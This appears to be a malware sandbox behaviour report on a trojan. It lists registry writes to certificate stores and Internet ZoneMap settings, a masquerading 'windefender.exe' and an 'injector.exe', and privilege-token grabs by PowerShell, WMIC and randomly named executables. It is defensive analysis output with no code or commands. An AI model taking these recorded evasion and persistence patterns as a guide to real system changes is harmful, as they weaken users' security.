Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-162 = "Central Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
